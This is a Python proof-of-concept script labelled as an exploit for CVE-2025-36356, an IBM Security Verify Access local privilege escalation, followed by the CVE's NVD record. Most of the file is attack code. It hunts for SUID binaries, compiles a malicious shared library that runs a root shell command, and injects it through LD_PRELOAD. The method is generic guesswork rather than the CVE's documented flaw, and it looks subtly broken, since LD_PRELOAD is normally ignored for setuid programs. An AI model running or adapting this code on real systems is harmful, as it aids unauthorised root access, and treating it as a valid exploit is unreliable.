CVE-2025-36356

# CVE-2025-36356 - IBM Security Verify Access Local Privilege Escalation PoC # This PoC demonstrates the concept of exploiting a SUID binary or # a service running with root privileges to escalate privileges. import os import subprocess import sys def check_ibm_verify_access(): """Check if IBM Security Verify Access is installed on the system.""" # Common installation paths for IBM Security Verify Access install_paths = [ "/opt/ibm/verify-access", "/opt/IBM/Security/VerifyAccess", "/usr/local/ibm/verify-access", "/var/ibm/isva" ] for path in install_paths: if os.path.exists(path): print(f"[+] Found IBM Security Verify Access at: {path}") return path print("[-] IBM Security Verify Access not found.") return None def find_suid_binaries(install_path): """Find SUID binaries within the IBM Security Verify Access installation.""" print(f"[*] Searching for SUID binaries in {install_path}...") try: result = subprocess.run( ["find", install_path, "-perm", "-4000", "-type", "f"], capture_output=True, text=True, timeout=30 ) suid_bins = result.stdout.strip().split("\n") if suid_bins and suid_bins[0]: print(f"[+] Found {len(suid_bins)} SUID binaries:") for binary in suid_bins: print(f" -> {binary}") return suid_bins except Exception as e: print(f"[-] Error searching for SUID binaries: {e}") return [] def exploit_privesc(target_binary): """ Attempt privilege escalation by exploiting a binary that runs with excessive privileges. """ print(f"[*] Attempting privilege escalation via: {target_binary}") # Common exploitation techniques: # 1. Path hijacking - if the binary calls other commands without full path # 2. Shared library injection - LD_PRELOAD attack # 3. Command injection via arguments # Technique 1: Check if binary is vulnerable to path hijacking print("[*] Checking for path hijacking vulnerability...") ldd_result = subprocess.run( ["ldd", target_binary], capture_output=True, text=True ) print(f"[*] Library dependencies:\n{ldd_result.stdout}") # Technique 2: Try to exploit via shared library injection print("[*] Attempting LD_PRELOAD injection...") payload_c = """ #include <stdio.h> #include <stdlib.h> #include <unistd.h> void _init() { if (getuid() == 0) { system("/bin/bash -c 'id > /tmp/root_proof.txt; echo \"Privilege escalation successful\" > /tmp/privesc_result.txt'"); } } """ payload_path = "/tmp/payload.c" so_path = "/tmp/payload.so" with open(payload_path, "w") as f: f.write(payload_c) # Compile the shared library compile_result = subprocess.run( ["gcc", "-shared", "-fPIC", "-nostartfiles", "-o", so_path, payload_path], capture_output=True, text=True ) if compile_result.returncode == 0: print(f"[+] Payload compiled successfully: {so_path}") # Attempt exploitation env = os.environ.copy() env["LD_PRELOAD"] = so_path result = subprocess.run( [target_binary], env=env, capture_output=True, text=True, timeout=10 ) # Check if exploitation was successful if os.path.exists("/tmp/root_proof.txt"): with open("/tmp/root_proof.txt", "r") as f: print(f"[+] Exploitation successful! Root proof: {f.read()}") return True else: print("[-] LD_PRELOAD technique did not succeed.") else: print(f"[-] Failed to compile payload: {compile_result.stderr}") return False def main(): print("=" * 60) print("CVE-2025-36356 PoC") print("IBM Security Verify Access Local Privilege Escalation") print("=" * 60) # Check current user current_uid = os.getuid() print(f"[*] Current UID: {current_uid}") if current_uid == 0: print("[!] Already running as root. Nothing to escalate.") return # Step 1: Find IBM Security Verify Access installation install_path = check_ibm_verify_access() if not install_path: print("[-] Target application not found. Exiting.") sys.exit(1) # Step 2: Find SUID binaries suid_binaries = find_suid_binaries(install_path) if not suid_binaries: print("[-] No SUID binaries found. Trying alternative methods...") # Try to find running processes with root privileges ps_result = subprocess.run( ["ps", "aux"], capture_output=True, text=True ) for line in ps_result.stdout.split("\n"): if "isva" in line.lower() or "verifyaccess" in line.lower(): print(f"[*] Found related process: {line}") # Step 3: Attempt exploitation for binary in suid_binaries: if os.path.isfile(binary): if exploit_privesc(binary): print("[+] Privilege escalation completed successfully!") break else: print("[-] Could not escalate privileges with available methods.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-36356", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.507", "lastModified": "2025-12-15T19:20:17.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Security Verify Access and IBM Security Verify Access Docker 10.0.0.0 through 10.0.9.0 and 11.0.0.0 through 11.0.1.0 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "CCA4ADF8-014B-4A43-AE12-CC7D46B0F8BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "9916DF0F-8A3E-4CB4-957F-286E168666A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "05FBA01C-DDCD-4B80-B14B-81DAB052CC8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "149CA168-1117-4B50-8F5A-B72D4BCC65F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndExcluding": "10.0.9.0", "matchCriteriaId": "FFF4D7D4-0D01-44CA-84A2-2EA59802D1CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "7E76C6CF-1E2A-403E-9C7F-619BE2057468"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix1:*:*:*:*:*:*", "matchCriteriaId": "B8BF3374-6B03-4A25-9F4D-F88C091804C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_docker:10.0.9.0:interim_fix2:*:*:*:*:*:*", "matchCriteriaId": "C8D09601-F55B-4307-8BEE-218F5CAC2138"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "16595130-3A46-4DD1-9DAA-53E534306975"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "4A7A934C-F8B6-44D1-9591-A3FDB86BEECB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndExcluding": "11.0.1.0", "matchCriteriaId": "81BD4D96-C9E9-422B-B18A-61ECFE711884"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_docker:11.0.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "0C06D5AD-67DD-46FA-BDF7-39A2E0EAAF95"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247215", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}